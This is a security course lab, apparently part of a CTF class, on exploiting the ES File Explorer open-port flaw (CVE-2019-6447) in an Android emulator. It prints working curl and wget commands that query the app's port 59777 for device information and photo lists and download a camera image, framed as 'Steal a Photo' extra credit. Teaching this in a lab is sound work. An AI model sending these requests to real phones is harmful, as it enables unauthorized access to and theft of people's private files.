M 207: ES Explorer Command Injection (10 pts)

What You Need for This Project

Background

ES File Explorer is very popular, with over 100 million downloads. However, it exposes your phone to remote control over the network.

Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447

It's very easy to see and exploit.

This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:

Find your Android Device's IP Address

Launch your Android emulator. In Settings, find your device's IP address, as shown below.

Installing the App

It was reported that the app was patched on Jan. 18, 2019, so download an archived vulnerable version here.

Drag the APK file onto your Genymotion device and drop it there. Approve the application installation.

Launching the App

Launch the app.

Click Agree, ALLOW, and "START NOW", as shown below.

You see information about your files, as shown below.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154:5555
adb devices -l
You should see your Genymotion device in the "List of devices attached", as shown below.

Viewing the Listening Process

On Kali, in a Terminal, execute these commands:
adb shell
netstat -pant | grep LISTEN
exit
You see a process named "com.estrongs.android.pop" listening on port 59777,

The Attack

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://172.16.123.154:59777
You see information about your phone, as shown below.

M 207: ftpPort (10 pts)

Find the text covered by a green box in the image above. That's the flag.

Extra Credit: Steal a Photo

If you have a webcam, you can do this.

In Genymotion, on the right side, click the Webcam icon, colored pink in the image below.

Adjust the camera to access your host system's webcam, as shown below.

On your Android device, open the Camera app and take a photo, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:

curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://172.16.123.154:59777
Find the path to your image in the output, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address and path to the correct values for your system:

wget http://172.16.123.154:59777//storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg
The file downloads, as shown below.

On Kali, in a Terminal, execute this command to view the file, replacing the filename with the correct name on your system:

xdg-open IMG_20190116_141301.jpg
The file appears, as shown below.

Email in a screenshot showing the photo in Kali, as shown above, for 10 pts extra credit.

Testing Security Apps

A student asked what defense will stop this attack. I can't find any app that does it. You could, of course, configure iptables from the command-line, but I haven't found any app that works.

Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.


Converted to a CTF 2-28-19
Extra credit explanation added 2-21-2020
Updated on 2-10-21